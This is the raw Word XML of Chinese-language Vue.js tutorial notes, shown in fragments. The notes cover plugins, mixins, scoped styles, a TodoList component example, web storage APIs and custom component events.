        <w:t>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//全局混入,所有的vc和vm都会引入这些配置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import {hunhe,hunhe2} from './mixin'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//使用混入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Vue.mixin(hunhe)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Vue.mixin(hunhe2)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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 用于增强Vue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·本质</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 包含install方法的一个对象，install的第一个参数是Vue，第二个以后的参数是插件使用者传递的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·定义插件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对象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install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1. 添加全局过滤器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(....)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2. 添加全局指令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directive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(....)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3. 配置全局混入(合)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mixin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(....)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4. 添加实例方法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$myMethod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() {...}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$myProperty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xxxx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·使用插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- Vue.use()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p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600200" cy="1501140"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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使用全局过滤器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|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点我测试一个hello方法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使用全局指令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v-fbind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</w:t>
      </w:r>
      <w:r>
        <w:t>plugins.js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install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z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z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//输出传递过来的参数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//全局过滤器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'mySlice'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slice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//定义全局指令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directive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'fbind'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//指令与元素成功绑定时（一上来）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//指令所在元素被插入页面时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inserted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//指令所在的模板被重新解析时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binding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//定义混入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mixin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y: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//给Vue原型上添加一个方法（vm和vc就都能用了）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plugins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'./plugins'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//应用（使用）插件，第二个以后的参数是插件使用者传递的数据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plugins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t>scoped样式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 让样式在局部生效，防止冲突</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·写法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- &lt;style scoped&gt;</w:t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"title"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&lt;!--添加scoped，表示只有本文件能使用该样式--&gt;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"demo"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"title"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"atguigu"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&lt;!--使用less语法，需要先安装7版本less-loader模块,cnpm i less-loader@7 --save，如果报错则使用npm install less -–save-dev--&gt;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"less"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.atguigu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</w:t>
      </w:r>
      <w:r>
        <w:t>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"title"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你好啊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&lt;!--一般不会再App的样式里写scoped--&gt;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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>TodoList案例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2215515"/>
            <wp:effectExtent l="0" t="0" r="2540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·组件化编码流程（通用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>实现静态组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:t>抽取组件，使用组件实现静态页面效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 展示动态数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 数据的类型、名称是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-- 数据保存在哪个组件？ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 交互——从绑定事件监听开始</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·前期准备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 安装nanoid模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- npm i nanoid --save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706880" cy="1737360"/>
            <wp:effectExtent l="0" t="0" r="0" b="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·MyFooter.vue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如果总数为0则不显示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"todo-footer"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写法1,如果已完成等于全部,则勾选,绑定change事件,实现全选功能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type="checkbox" :checked="isAll" @change="checkAll"/&gt;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写法2,双向数据绑定,但是计算属性要设置set方法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将获取的数据插入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已完成{{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/ 全部{{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绑定点击事件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btn-danger"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清除已完成任务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"checkAllTodo"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"clearAllTodo"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//计算属性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//计算所有数量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length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//计算已完成的数量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doneTotal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//使用reduce方法进行条件统计数组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//第一个参数是回调函数,数组长度是几,该回调函数就调用几次,第一个参数是上一次的统计值,第二个参数是当前遍历的数组值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//第二个参数是统计的初始值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reduce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current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if(current.done){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return pre+1;//如果勾选,pre+1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return pre;//未勾选,返回pre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current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//写法1,计算是否全部完成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isAll(){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//如果已完成等于总数,并且总是大于0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return this.doneTotal === this.total &amp;&amp; this.total &gt; 0;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//写法2,计算是否全部完成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isAll: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&amp;&amp;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&gt;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//参数是勾选状态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//写法1,实现全选功能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checkAll(e){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//获取选中状态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 console.log(e.target.checked);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//将选中状态通过addTodo函数传给app组件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this.checkAllTodo(e.target.checked);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//清空选中todo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confirm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"确定删除吗?"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/*footer*/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position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relative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·MyHeader.vue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"todo-header"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写法1，添加回车响应事件，并进行双向绑定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"请输入你的任务名称，按回车键确认"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keyup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写法2添加回车响应事件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type="text" placeholder="请输入你的任务名称，按回车键确认" @keyup.enter="add"/&gt;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//引入nanoid模块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"nanoid"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"Header"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"addTodo"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//写法1，双向绑定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trim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())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"输入不能为空"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//如果输入为空,结束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//获取输入信息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console.log(this.title);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//调用nanoid,将用户的输入包装成一个todo对象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trim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//查看todo对象是否正确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console.log(todoObj);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//将todoObj通过addTodo函数传给app组件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//清空输入框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//写法2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add(e){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if(!e.target.value.trim()) return alert("输入不能为空");//如果输入为空,结束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//获取输入信息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 console.log(e.target.value);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//调用nanoid,将用户的输入包装成一个todo对象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const todoObj = {id:nanoid(),title:e.target.value.trim(),done:false};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//查看todo对象是否正确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 console.log(todoObj);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//将todoObj通过addTodo函数传给app组件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this.addTodo(todoObj);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//清空输入框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e.target.value = "";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/*header*/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560px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28px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#ccc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7px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236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0.075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236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·MyItem.vue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写法1.设置是否勾选,并绑定点击事件,改变勾选状态,并将id传递给事件回调函数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type="checkbox" :checked="todo.done" @click="handleCheck(todo.id)"/&gt;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写法2.设置是否勾选,并绑定change事件,改变勾选状态,并将id传递给事件回调函数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写法3.使用双向绑定设置是否勾选,但不建议这么写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            &lt;input type="checkbox" v-model="todo.done"/&gt;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将数据插入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绑定点击响应事件,并将id传入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btn-danger"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删除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"deleteTodo"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//设置勾选状态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//获取所点击todo的id值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console.log(id);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//将id通过checkTodo函数传给app组件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confirm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"确定删除吗?"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//将id通过deleteTodo函数传给app组件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console.log(this.todo);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spoted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/*item*/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list-style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position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relative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li:before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initial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li:last-child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鼠标悬停li时,修改背景颜色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#e9e9e9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鼠标悬停li时,操作li的button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·MyList.vue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"todo-main"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遍历数组,:key要写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将数据传给item组件,并将checkTodo和deleteTodo函数传给MyItem组件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"./MyItem.vue"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//注册组件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"deleteTodo"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/*main*/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.todo-main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.todo-empty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"todo-wrap"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将addTodo函数传给header组件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将todos数据传给list组件,并将checkTodo和deleteTodo函数传给MyList组件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将todos数据传给MyFooter组件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"./components/MyHeader.vue"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"./components/MyList.vue"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"./components/MyFooter.vue"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"App"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//注册组件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//初始化数据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//done标识是否完成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"0001"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"吃饭"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"0002"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"睡觉"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"0003"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"打豆豆"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//接收header传过来的数据,添加todo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console.log("我是app组件,我收到了数据",todoObj);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//将接收到的数据添加到数组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//接收Item传过来的数据,改变勾选状态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//遍历数组,根据id值找到对应的todo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//找到todo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//改变done的勾选状态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//接收Item传过来的数据,删除todo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//根据id值过滤掉要删除的todo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//接收footer传过来的数据,实现全选/全不选功能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//遍历数组,把done改成全选或全不选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//接收footer传过来的通知,清除所有已经完成的todo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//过滤数组,把done为true的清除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/*base*/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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体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#da4f49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.todo-wrap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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>组件化编码流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>拆分静态组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:t>组件要按照功能点拆分，命名不要与html元素冲突。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4942205" cy="1863090"/>
            <wp:effectExtent l="0" t="0" r="10795" b="11430"/>
            <wp:docPr id="54" name="图片 54" descr="985d1e72f3b7ed51f1881a615bdaa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985d1e72f3b7ed51f1881a615bdaa1c"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:srcRect l="27759" t="16196" r="5109" b="43315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- </w:t>
      </w:r>
      <w:r>
        <w:t>实现动态组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:t>考虑好数据的存放位置，数据是一个组件在用，还是一些组件在用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--- </w:t>
      </w:r>
      <w:r>
        <w:t>一个组件在用：放在组件自身即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--- </w:t>
      </w:r>
      <w:r>
        <w:t>一些组件在用：放在他们共同的父组件上（状态提升）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>实现交互：从绑定事件开始。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>props适用于</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>父组件 ==&gt; 子组件 通信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>子组件 ==&gt; 父组件 通信（要求父先给子一个函数）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4919345" cy="3540125"/>
            <wp:effectExtent l="0" t="0" r="3175" b="10795"/>
            <wp:docPr id="52" name="图片 52" descr="2947831591d4a858dec8e88081b41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947831591d4a858dec8e88081b415e"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:srcRect l="15733" b="2975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</w:t>
      </w:r>
      <w:r>
        <w:t>使用v-model时要切记</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>v-model绑定的值不能是props传过来的值，因为props是不可以修改的！</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>props传过来的若是对象类型的值，修改对象中的属性时Vue不会报错，但不推荐这样做</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器本地存储</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webStorage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·存储内容大小一般支持5MB左右（不同浏览器可能还不一样）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·浏览器端通过 Window.sessionStorage 和 Window.localStorage 属性来实现本地存储机制。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·相关API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- xxxxxStorage.setItem('key', 'value');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--该方法接受一个键和值作为参数，会把键值对添加到存储中，如果键名存在，则更新其对应的值</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- xxxxxStorage.getItem('person');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 该方法接受一个键名作为参数，返回键名对应的值</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- xxxxxStorage.removeItem('key');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 该方法接受一个键名作为参数，并把该键名从存储中删除。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- xxxxxStorage.clear()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 该方法会清空存储中的所有数据。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- SessionStorage存储的内容会随着浏览器窗口关闭而消失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- LocalStorage存储的内容，需要手动清除才会消失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- xxxxxStorage.getItem(xxx)如果xxx对应的value获取不到，那么getItem的返回值是null。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- JSON.parse(null)的结果依然是null。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage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saveData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点我保存一个数据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readData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点我读取一个数据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点我删除一个数据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deleteAllData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点我清空一个数据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//保存数据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saveData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'hello!!!'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//数值类型会转换成字符串类型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//读取数据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readData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result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result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console.log(localStorage.getItem('msg3'))//null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removeItem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//清空数据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deleteAllData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t>sessionStorage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DOCTYPE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charset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"UTF-8"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/&gt;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head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saveData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点我保存一个数据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readData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点我读取一个数据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点我删除一个数据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onclick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deleteAllData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()"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点我清空一个数据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"text/javascript"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age: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saveData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'hello!!!'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readData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result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result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console.log(sessionStorage.getItem('msg3'))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removeItem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'msg2'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deleteAllData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sessionStorage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html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TodoList本地存储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2004060" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="762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"todo-wrap"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'./components/MyHeader'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'./components/MyList'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'./components/MyFooter.vue'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//由于todos是MyHeader组件和MyFooter组件都在使用，所以放在App中（状态提升）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//读取数据,将数据从浏览器解析出来,赋值给todos,如果为空,todos就是空数组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 || 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//添加一个todo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//全选or取消全选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//清除所有已经完成的todo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//监视todos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deep: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//打开深度监视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//发生变化时调用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//将最新数据转成JSON格式存储到浏览器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/*base*/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#da4f49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.todo-wrap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pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件自定义事件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·一种组件间通信的方式，适用于：子组件 ===&gt; 父组件</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用场景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- A是父组件，B是子组件，B想给A传数据，那么就要在A中给B绑定自定义事件（事件的回调在A中）。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·绑定自定义事件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第一种方式，在父组件中：&lt;Demo @atguigu="test"/&gt; 或 &lt;Demo v-on:atguigu="test"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第二种方式，在父组件中：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;Demo ref="demo"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      ......</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      mounted(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         this.$refs.xxx.$on('atguigu',this.test)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·若想让自定义事件只能触发一次，可以使用once修饰符，或$once方法。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·触发自定义事件：this.$emit('atguigu',数据)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·解绑自定义事件this.$off('atguigu')</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·组件上也可以绑定原生DOM事件，需要使用native修饰符</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·注意：通过this.$refs.xxx.$on('atguigu',回调)绑定自定义事件时，回调要么配置在methods中，要么用箭头函数，否则this指向会出问题！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272540" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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"school"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sendSchoolName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把学校名给App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'getSchoolName'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//通过props发送学校名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sendSchoolName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点我number++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sendStudentlName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把学生名给App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unbind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解绑atguigu事件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销毁当前Student组件的实例(vc)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'add回调被调用了'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++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//触发Student组件实例身上的atguigu事件,并携带数据发送给App组件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sendStudentlName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//触发Student组件实例身上的atguigu事件,并携带数据发送给App组件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888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900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//可同时触发多个事件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this.$emit('demo')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this.$emit('click')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//解绑atguigu事件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unbind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//解绑一个自定义事件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this.$off(['atguigu','demo']) //解绑多个自定义事件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this.$off() //解绑所有的自定义事件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//销毁了当前Student组件的实例，销毁后所有Student实例的自定义事件全都不奏效。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"less"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"app"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}}，学生姓名是:{{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通过父组件给子组件传递函数类型的props实现：子给父传递数据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通过父组件给子组件绑定一个自定义事件实现：子给父传递数据（第一种写法，使用@或v-on）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&lt;Student v-on:atguigu="getStudentName"/&gt;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只触发1次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&lt;Student @atguigu.once="getStudentName"/&gt;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同时绑定多个自定义事件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atguigu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通过父组件给子组件绑定一个自定义事件实现：子给父传递数据（第二种写法，使用ref）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如果要绑定原生事件,需要在后面加.native,不然会被认为是自定义事件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//通过props获取学校名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getSchoolName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'App收到了学校名：'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//通过绑定自定义事件获取学生名,...params可将传递的任意个数据整合成数组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,...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'App收到了学生名：'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//将发送过来的name存到data的studentName中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'demo事件被触发了！'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//挂载完毕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$refs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//绑定自定义事件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//还可以使用以下方法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this.$refs.student.$on('atguigu',(name,...params)=&gt;{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 console.log(this);//箭头函数会往外找this,这里的this是App组件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console.log('App收到了学生名：',name,params);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//将发送过来的name存到data的studentName中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this.studentName = name;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//不能使用以下方法绑定自定义事件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this.$refs.student.$on('atguigu',function(name,...params){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 console.log(this);//这里的this是调用emit方法的组件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console.log('App收到了学生名：',name,params);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//将发送过来的name存到data的studentName中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this.studentName = name;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this.$refs.student.$once('atguigu',this.getStudentName) //绑定自定义事件（一次性）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gray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C586C0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>import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Vue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C586C0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>from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C586C0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>import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App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C586C0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>from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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>Vue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.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config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.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productionTip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= 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new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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>Vue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el: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'#app'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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
